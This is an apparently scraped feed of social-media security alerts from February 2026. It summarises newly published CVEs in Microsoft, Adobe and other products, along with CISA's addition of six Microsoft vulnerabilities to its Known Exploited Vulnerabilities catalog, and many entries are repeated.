CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:51:48.077000
3 posts
π¨ karutoil catalyst (<11980aaf3f46315b02777f325ba02c56b110165d) faces CRITICAL OS command injection (CVE-2026-26009, CVSS 10.0). Users with template perms can execute root shell commands cluster-wide. Patch immediately! https://radar.offseq.com/threat/cve-2026-26009-cwe-78-improper-neutralization-of-s-ff7845bb #OffSeq #vuln #infosec #CVE202626009
##π΄ CVE-2026-26009 - Critical (9.9)
Catalyst is a platform built for enterprise game server hosts, game communities, and billing panel integrations. Install scripts defined in server templates execute directly on the host operating system as root via bash -c, with no sandboxing or c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-26009/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-26009 - Critical (9.9)
Catalyst is a platform built for enterprise game server hosts, game communities, and billing panel integrations. Install scripts defined in server templates execute directly on the host operating system as root via bash -c, with no sandboxing or c...
π https://www.thehackerwire.com/vulnerability/CVE-2026-26009/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21251 - High (7.8)
Use after free in Windows Cluster Client Failover allows an authorized attacker to elevate privileges locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21251/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21251 - High (7.8)
Use after free in Windows Cluster Client Failover allows an authorized attacker to elevate privileges locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21251/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21259 - High (7.8)
Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to elevate privileges locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21259/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21259 - High (7.8)
Heap-based buffer overflow in Microsoft Office Excel allows an unauthorized attacker to elevate privileges locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21259/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21312 - High (7.8)
Audition versions 25.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must op...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21312/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21312 - High (7.8)
Audition versions 25.3 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must op...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21312/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21330 - High (7.8)
After Effects versions 25.6 and earlier are affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue req...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21330/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21330 - High (7.8)
After Effects versions 25.6 and earlier are affected by an Access of Resource Using Incompatible Type ('Type Confusion') vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue req...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21330/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21329 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21329/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21329 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21329/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21326 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21326/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21326 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21326/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21325 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21325/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21325 - High (7.8)
After Effects versions 25.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to e...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21325/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21357 - High (7.8)
InDesign Desktop versions 21.1, 20.5.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21357/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21357 - High (7.8)
InDesign Desktop versions 21.1, 20.5.1 and earlier are affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21357/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21351 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21351/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21351 - High (7.8)
After Effects versions 25.6 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must ope...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21351/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21511 - High (7.5)
Deserialization of untrusted data in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21511/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21511 - High (7.5)
Deserialization of untrusted data in Microsoft Office Outlook allows an unauthorized attacker to perform spoofing over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21511/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21523 - High (8)
Time-of-check time-of-use (toctou) race condition in GitHub Copilot and Visual Studio allows an authorized attacker to execute code over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21523/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21523 - High (8)
Time-of-check time-of-use (toctou) race condition in GitHub Copilot and Visual Studio allows an authorized attacker to execute code over a network.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21523/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
11 posts
π CVE-2026-21533 - High (7.8)
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21533/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21533
CVE-2026-21533
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
π CVSS Score: 7.8
β οΈ Severity: High
π¨ Exploited: true
π
Published: 10.02.2026, 18:16
π·οΈ Aliases: CVE-2026-21533
π‘οΈ CWE: CWE-269
π CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
π References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21533
π¨ [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
β οΈ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
- Name: Microsoft Windows Shell Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21510 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21510
β οΈ CVE-2026-21513 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21513)
- Name: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2026-21513 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21513
β οΈ CVE-2026-21514 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21514)
- Name: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Office
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21514
β οΈ CVE-2026-21519 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21519)
- Name: Microsoft Windows Type Confusion Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21519 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21519
β οΈ CVE-2026-21525 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21525)
- Name: Microsoft Windows NULL Pointer Dereference Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21525 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21525
β οΈ CVE-2026-21533 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21533)
- Name: Microsoft Windows Improper Privilege Management Vulnerability
- Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
- Known To Be Used in Ransomware Campaigns? Unknown
- Vendor: Microsoft
- Product: Windows
- Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
#SecDB #InfoSec #CVE #CISA_KEV #cisa_20260210 #cisa20260210 #cve_2026_21510 #cve_2026_21513 #cve_2026_21514 #cve_2026_21519 #cve_2026_21525 #cve_2026_21533 #cve202621510 #cve202621513 #cve202621514 #cve202621519 #cve202621525 #cve202621533
##CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21533
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21533
βΌοΈ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##π CVE-2026-21533 - High (7.8)
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21533/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21533
CVE-2026-21533
Improper privilege management in Windows Remote Desktop allows an authorized attacker to elevate privileges locally.
π CVSS Score: 7.8
β οΈ Severity: High
π¨ Exploited: true
π
Published: 10.02.2026, 18:16
π·οΈ Aliases: CVE-2026-21533
π‘οΈ CWE: CWE-269
π CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (secure@microsoft.com)
π References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21533
CISA has updated the KEV catalogue, and Microsoft is the winner.
- CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21514
- CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21519
- CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21533
- CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21510
- CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21525
CVE-2026-21513: Microsoft MSHTML Framework Protection Mechanism Failure Vulnerability https://www.cve.org/CVERecord?id=CVE-2026-21513
More:
CISA Releases Guide to Help Critical Infrastructure Users Adopt More Secure Communication https://www.cisa.gov/news-events/news/cisa-releases-guide-help-critical-infrastructure-users-adopt-more-secure-communication
Poland Energy Sector Cyber Incident Highlights OT and ICS Security Gaps https://www.cisa.gov/news-events/alerts/2026/02/10/poland-energy-sector-cyber-incident-highlights-ot-and-ics-security-gaps #CISA #infosec #Microsoft #vulnerability
##CVE ID: CVE-2026-21533
Vendor: Microsoft
Product: Windows
Date Added: 2026-02-10
Notes: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21533 ; https://nvd.nist.gov/vuln/detail/CVE-2026-21533
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2026-21533
βΌοΈ CISA has added 6 vulnerabilities to the KEV Catalog
CVE-2026-21513: Microsoft Internet Explorer Protection Mechanism Failure Vulnerability: Microsoft Internet Explorer contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21525: Microsoft Windows NULL Pointer Dereference Vulnerability: Microsoft Windows Remote Access Connection Manager contains a NULL pointer dereference that could allow an unauthorized attacker to deny service locally.
CVE-2026-21510: Microsoft Windows Shell Protection Mechanism Failure Vulnerability: Microsoft Windows Shell contains a protection mechanism failure vulnerability that could allow an unauthorized attacker to bypass a security feature over a network.
CVE-2026-21533: Microsoft Windows Improper Privilege Management Vulnerability: Microsoft Windows Remote Desktop Services contains an improper privilege management vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21519: Microsoft Windows Type Confusion Vulnerability: Microsoft Desktop Windows Manager contains a type confusion vulnerability that could allow an authorized attacker to elevate privileges locally.
CVE-2026-21514: Microsoft Office Word Reliance on Untrusted Inputs in a Security Decision Vulnerability: Microsoft Office Word contains a reliance on untrusted inputs in a security decision vulnerability that could allow an authorized attacker to elevate privileges locally.
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-25992 - High (7.5)
SiYuan is a personal knowledge management system. Prior to 3.5.5, the /api/file/getFile endpoint uses case-sensitive string equality checks to block access to sensitive files. On case-insensitive file systems such as Windows, attackers can bypass ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25992/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25992 - High (7.5)
SiYuan is a personal knowledge management system. Prior to 3.5.5, the /api/file/getFile endpoint uses case-sensitive string equality checks to block access to sensitive files. On case-insensitive file systems such as Windows, attackers can bypass ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25992/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-1848 - High (7.5)
Connections received from the proxy port may not count towards total accepted connections, resulting in server crashes if the total number of connections exceeds available resources. This only applies to connections accepted from the proxy port, p...
π https://www.thehackerwire.com/vulnerability/CVE-2026-1848/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-1848 - High (7.5)
Connections received from the proxy port may not count towards total accepted connections, resulting in server crashes if the total number of connections exceeds available resources. This only applies to connections accepted from the proxy port, p...
π https://www.thehackerwire.com/vulnerability/CVE-2026-1848/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21347 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in th...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21347/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21347 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in th...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21347/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21345 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21345/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21345 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21345/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21353 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21353/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21353 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21353/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:51:48.077000
2 posts
π CVE-2026-21352 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21352/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21352 - High (7.8)
DNG SDK versions 1.7.1 2410 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim mu...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21352/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:42
2 posts
π CVE-2026-21346 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21346/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21346 - High (7.8)
Bridge versions 15.1.3, 16.0.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21346/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:42
2 posts
π CVE-2026-21344 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21344/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21344 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21344/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:42
2 posts
π CVE-2026-1507 - High (7.5)
The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.
π https://www.thehackerwire.com/vulnerability/CVE-2026-1507/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-1507 - High (7.5)
The affected products are vulnerable to an uncaught exception that could allow an unauthenticated attacker to remotely crash core PI services resulting in a denial-of-service.
π https://www.thehackerwire.com/vulnerability/CVE-2026-1507/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:42
2 posts
π CVE-2026-21349 - High (7.8)
Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victi...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21349/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21349 - High (7.8)
Lightroom Desktop versions 15.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victi...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21349/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:37
2 posts
π CVE-2026-21341 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21341/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21341 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21341/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:37
2 posts
π CVE-2026-21342 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21342/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21342 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a v...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21342/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:36
2 posts
π CVE-2026-21343 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21343/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21343 - High (7.8)
Substance3D - Stager versions 3.1.6 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerabil...
π https://www.thehackerwire.com/vulnerability/CVE-2026-21343/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##updated 2026-02-10T21:31:29
11 posts
π CVE-2026-21514 - High (7.8)
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
π https://www.thehackerwire.com/vulnerability/CVE-2026-21514/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-21514
CVE-2026-21514
Reliance on untrusted inputs in a security decision in Microsoft Office Word allows an unauthorized attacker to bypass a security feature locally.
π CVSS Score: 7.8
β οΈ Severity: High
π¨ Exploited: true
π
Published: 10.02.2026, 18:16
π·οΈ Aliases: CVE-2026-21514
π‘οΈ CWE: CWE-807
π CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (secure@microsoft.com)
π References: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-21514 https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21514
π¨ [CISA-2026:0210] CISA Adds 6 Known Exploited Vulnerabilities to Catalog (https://secdb.nttzen.cloud/security-advisory/detail/CISA-2026:0210)
CISA has added 6 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.
β οΈ CVE-2026-21510 (https://secdb.nttzen.cloud/cve/detail/CVE-2026-21510)
